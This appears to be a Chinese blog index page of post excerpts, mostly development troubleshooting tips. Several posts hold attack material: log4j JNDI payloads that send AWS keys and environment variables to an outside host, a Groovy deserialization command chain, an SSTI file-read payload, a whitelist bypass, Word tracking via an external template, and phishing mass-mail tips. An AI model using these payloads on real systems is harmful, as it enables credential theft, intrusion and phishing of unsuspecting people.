- 博客(44)
- 收藏
- 关注
RSS订阅原创 web3.eth.filter 相关
web3.eth.filter 这个主要是用来监听得,如下代码块所示,就是监听每个新块得信息from web3 import Web3import timeimport jsonbsc = "https://bsc-dataseed.binance.org/"web3 = Web3(Web3.HTTPProvider(bsc))def handle_event(event): jsonEventContents = json.loads(Web3.toJSON(event))
2022-02-12 21:04:54
10282
5
原创 log4j利用相关
相关payload:https://gist.github.com/am1ru1/275af8ab41b12d72b94bd18ba779c51b信息泄露:jndi可以解析环境变量,如下所示,所以可以造成相关信息泄露${jndi:ldap://secruitycompassadvisory.com/version=${env:JAVA_VERSION}}还可以利用dns把数据带出去${jndi:dns:// ${env:AWS_ACCESS_KEY}. ${env:AWS_SECRE
2021-12-20 10:38:38
2159
原创 Please provide compiled classes of your project with sonar.java.binaries property sonarqube扫描报错
解决:在项目目录下面执行 mvn install即可
2021-11-17 15:26:59
543
原创 postgresql使用总结(坑)
1,Must be configured to use UTF-8 charsetCREATE DATABASE "example_db" WITH OWNER "postgres" ENCODING 'UTF8' LC_COLLATE = 'en_US.UTF-8' LC_CTYPE = 'en_US.UTF-8' TEMPLATE template0;创建数据时改变编码形式
2021-10-15 14:22:45
181
原创 .gitlab-ci.yml使用总结
1,碰到exit status 1时,没有任何报错,加入下面这个,查看报错情况variables:SECURE_LOG_LEVEL:debug
2021-10-11 18:19:09
112
原创 docker中试用gitlab ci/cd
1,安装gitlabdocker run --detach --publish 443:443 --publish 80:80 --name gitlab --restart always gitlab/gitlab-ce安装成功之后,直接打开127.0.0.1访问即可2, 安装runnerdocker run -d --name gitlab-runner --restart always \ -v /path/to/gitlab-runner/config:/etc/g.
2021-09-01 15:27:43
127
原创 Internal JSON-RPC error. { “code“: -32000, “message“: “execution reverted“ } 报错解决
1,原因最近在部署safemoon合约的时候,直接把bsc浏览器上面的合约代码复制,报了上面哪个错误2,解决这个原因主要是路由地址写错了源代码中的地址是这个:0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F由于我是在测试网进行合约部署的,所以需要改成下面那个地址testnet : 0xD99D1c33F9fC3444f8101754aBC46c52416550D1mainnet : 0x10ED43C718714eb63d5aA57B78B54704E25
2021-08-12 20:08:47
9536
7
原创 多个java版本切换
1,通过这种方式安装多个java版本sudo apt updatesudo apt install openjdk-8-jdksudo apt install openjdk-11-jdk2,切换java版本sudo update-alternatives --config java
2021-06-29 10:08:31
200
原创 idea远程调试agent
创建remote jvm debug项目,在host处填入远程服务器的地址下面那一串command line argument 就是附加在agent运行时的代码如下所示,运行webgoat项目,远程调试agentjava -javaagent:/agent.jar -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar /webgoat-server-8.0.0.M16.jar运行服务,idea点击debug
2021-06-08 17:59:51
378
1
原创 (区块链学习 一)fallback函数
1,fallback函数fallback函数,回退函数,是合约里的特殊无名函数,有且仅有一个。它在合约调用没有匹配到函数标识符,或者调用没有带任何数据时被自动调用(例如转账函数)。2,实例以Ethernaut平台为例子pragma solidity ^0.4.18;import 'zeppelin-solidity/contracts/ownership/Ownable.sol';import 'openzeppelin-solidity/contracts/math/SafeMath.sol
2021-05-15 15:32:06
1581
原创 java 反序列化(1):Groovy链
1,完整利用代码如下:public class groovtest { static String command = "calc"; public static void main(String[] args){ // write object try{ //封装我们需要执行的对象 MethodClosure methodClosure = new MethodClosure(command,"execut
2021-03-24 20:55:42
254
原创 word文档注入(追踪word文档)未完
1,需求追踪word文档是否被打开2,实现正常来说,解压word文档。内部如下所示打开如下目录所示的文件在文档后面追加如下代码,这是个配置文件,target可以配置自己的url<Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="url" TargetMode="External"/>
2021-03-16 18:14:00
300
1
原创 很抱歉,无法打开xxxxx.docx,因为内容有问题(重打包问题)
docx文件修改后缀为zip解压之后,重新打包出现上面这个问题解决:在解压文件里面全选,并且进行压缩,选择仅存储之后重新改为docx即可
2021-03-16 15:40:05
1287
原创 burpsuit 抓取python request请求
proxies = { "http": 'http://127.0.0.1:8080', "https": 'http://127.0.0.1:8080'}requests_request = partial(requests.request, proxies=proxies, verify=False, allow_redirects=False)url="https://www.baidu.com"headers={'User-Agent': 'Mozilla/5.0 (Wind
2021-03-10 20:08:32
3236
原创 UnicodeDecodeError: ‘utf-8‘ codec can‘t decode byte 0xe6 in position 76131: invalid continuation byt
utf-8编码会报错改成这个unicode_escape编码解决了
2021-03-09 18:01:19
308
原创 改js代码没有效果
问题以上面这个目录框架为例子,在里面改完js代码后,重启服务没有效果。解决这是因为在这里改的,只是源代码,而前端用的是不是这个通过访问网站,查看到底引用了哪个js文件,如下所示所以前端用的是下面这个js文件所以需要在这个文件里面,这个一般都是压缩过后的代码可以通过下面这个网站格式化后进行操作https://www.sojson.com/yasuojs.html...
2021-03-08 11:05:09
801
原创 钓鱼时如何实现批量发送
0x01 困境在做钓鱼邮件时,有时候需要发送的人过多,导致在邮件发送这个过程中花费过多时间。0x02 解决思路1,第一种可以用如下这种,直接在收件人中实现批量发送,但是有个问题是,这种情况实现批量发送,所有收件人的邮件内容都是一样,这种就不能实现每个人邮件的特殊化(因为需要在邮件中加入tracker,通过这个tracker来跟踪对应收件人对应邮件的状态),所以这种方法目前有问题。msg.SetHeader(“Bcc”, mailto…2,第二种直接就是并发来发送,利用goruntine,每一个收件
2021-02-24 17:09:05
306
原创 error: command ‘x86_64-linux-gnu-gcc‘ failed with exit status 1 解决
安装gmpy2时报错执行下面这个安装组件apt install libgmp-dev libmpfr-dev libmpc-dev之后就好了
2021-02-22 12:04:11
507
原创 Apache Shiro身份认证绕过漏洞复现(CVE-2020-17523)
1,安装直接copy代码下载,运行即可https://github.com/jweny/shiro-cve-2020-175232,复现3,分析其实就是空格绕过了身份验证进入domatch函数发现pathdirs中只剩下了admin,空格字段没有了主要就是trim函数去掉了空格导致最后在这里返回false...
2021-02-05 15:48:11
3415
6
原创 DataTables warning: table id=campaignTable - Cannot reinitialise DataTable.解决
DataTables warning: table id=campaignTable - Cannot reinitialise DataTable主要就是不能初始化了解决:在对应的datatable下加上destroy:true,即可解决
2021-01-18 11:23:20
273
原创 idea调试burpsuit插件
1,版本选择首先调试的时候,用的是官方社区版的,因为目前网上的专业版都是破解版,调试的时候经常出现各种各样的问题,所以,可以先用社区版调试写代码,之后在专业版上用(有些专业版的api可能没法用)。2,启动burpsuitjava -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8888 -jar burpsuite_community.jar在idea中创建一个remote应用,端口为上面启动监听的端口之后在ide
2021-01-04 16:07:16
1077
1
原创 celery 相关
1,Received unregistered task of type 'xxxxx'.这个问题其实就是task名与work消费时的名字不一致导致的首先这些是发送到rabbitmq的task主要就是这个task的名字与这个python下面的task不一致,就是下面这个的名字2,you have not defined a default connection这里我是用的celery加mongoengine,在worker运行时,到处理task的任务里面,有mongo查询语句,进而报错,这
2020-11-24 11:18:50
151
2
原创 chrome插件调试
1,content-script直接f12可以进行调试,如下所示2,background 可以先点开背景页,之后在如下页面进行调试
2020-11-13 11:56:10
687
原创 svg 验证码识别体验
今天在登陆个网站时,刷新验证码,出现<svg xmlns="http://www.w3.org/2000/svg" width="104" height="28" viewBox="0,0,104,28"><path fill="#333" d="M20.05 19.10L13.39 11.90L13.38 11.88Q14.11 14.65 14.11 17.32L14.08 17.29L14.09 17.30Q14.02 21.50 12.55 25.47L12.66 25.58L1
2020-11-10 16:26:52
1270
原创 模板注入总结
1,常用命令().__class__ 当前类().__class__.__mro__ 当前类继承了哪些类().__class__.__mro__[-1].__subclasses__() object类的所有子类,具体就可以利用这个来找自己所需的类比如有时第40为file函数,就可以通过''.__class__.__mro__[-1].__subclasses__()[40]("/etc/password").read() 来进行读取文件内容''.__class__.__mro
2020-10-08 18:18:53
407
2
转载 volatile原理
1,缓存一致性来源:多核cpu,每个cpu拥有自己的缓存,当一个缓存修改时,另一个缓存数据过时了。2,“snooping(窥探)”协议:常用的缓存一致性协议都是属于“snooping(窥探)”协议,各个核能够时刻监控自己和其他核的状态,从而统一管理协调。窥探的思想是:CPU的各个缓存是独立的,但是内存却是共享的,所有缓存的数据最终都通过总线写入同一个内存,因此CPU各个核都能“看见”总线,即各...
2020-09-28 15:16:28
61
原创 redis常用命令总结(自备)
1,linux连接命令$ redis-cli -h host -p port -a password也可以直接redis-cli,进去时候用auth password来进行验证2,常用命令keys * 查询所有键;hkeys key 获取所有的filed;type key 获取键的类型;hget key filed 获取filed值;...
2020-09-28 15:13:35
80
原创 pyppeteer 遇到的问题
1,/root/.local/share/pyppeteer/local-chromium/575458/chrome-linux/chrome: error while loading shared libraries: libatk-1.0.so.0: cannot open shared object file: No such file or directory这是在系统上缺少某些依赖https://github.com/puppeteer/puppeteer/blob/main/docs/tro
2020-09-24 12:07:21
588
原创 No files or folders found to process
如果服务器,路径映射都配置好了,还是出现这个问题,那就是项目里面有python文件,它不是空的,必须伤删除掉,才可以从服务器上下载文件
2020-09-16 20:05:43
3216
2
原创 mysql 8.0常用(持续更新)
1,修改用户密码ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'root';如果出现ERROR 1396 (HY000): Operation ALTER USER failed for 'root'@'localhost'检查root的权限是否是%,如果是把’root’@‘localhost’ 修改为’root’@’%’...
2020-09-14 11:38:47
184
原创 php parse_url绕过白名单
$host = parse_url($url, PHP_URL_HOST); if (!in_array($host, [ 'xxx.xxx', ]))已知这种检验,判断url的host是否在白名单中,此时可以通过http://[email protected]这种方式绕过,http://[email protected]解析host为xxx.xxx,而当浏览器访问这个网站时,\符号会变成/符号,导致绕过。...
2020-09-03 12:32:03
779
原创 python的str is not callable问题
主要就是之前用了str这个关键字当作变量,导致后来利用str()函数的时候不能识别出来。
2020-08-06 11:21:06
681
原创 汇编学习
1,基本知识AH&AL=AX(accumulator):累加寄存器BH&BL=BX(base):基址寄存器CH&CL=CX(count):计数寄存器DH&DL=DX(data):数据寄存器SP(Stack Pointer):堆栈指针寄存器BP(Base Pointer):基址指针寄存器SI(Source Index):源变址寄存器DI(Destination Index):目的变址寄存器IP(Instruction Pointer):指令指针寄存器CS(
2020-06-30 21:04:28
200
1
原创 shellcode编写(未完)
一:基本对于shellcode来说,它是独立的,可以附加在各种各样的进程中,所以他的每句代码都是独立,只与shellcode中的代码有联系,与外部代码都是隔绝的。在生成exe的时候,编译器将函数转为真正实现这个函数功能的入口地址(绝对地址),由于shellcode是附加在其他进程上的,每个进程是不一样的,这个地址可能是其他功能,所以运用绝对地址不符合。所以需要动态调用,先获得函数的地址,在进行执行。类似于这种:GetProcAddress(LoadLibraryA(“kernel32.dll”),
2020-06-25 22:03:53
209
原创 shellcode编写学习-环境
本系列都是观看shellcode编写视频总结给自己看的,以防忘记环境vs2017修改函数入口点禁用安全检查此时exe中没有多余的函数兼容xpdebug设置为mtd,release为mt在清单文件中选否,去除exe的资源文件...
2020-06-23 18:32:02
139
原创 回编译失败
No resource identifier found for attribute ‘compileSdkVersion’ in package ‘android’问题:在这个包中没有找到这些属性的资源符解决:没找到,就把这些属性删掉,重新编译,签名即可
2020-06-04 21:38:33
559
原创 docker用法
1,docker run启动一个镜像生成容器2,docker start启动一个容器3,docker restart重新启动4,docker los查看日志5,docker exec -it mysql-master /bin/bash 进入容器6,docker updata id --restart=always 自启动...
2019-12-22 14:49:36
110
原创 从thinkphp远程代码执行学php反射类
代码审计到这,出现了reflection类定义:然后调用invokeargs方法定义:方法为$methon[1],与回调函数用法类似所以执行whoami
2019-05-01 19:34:03
233
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人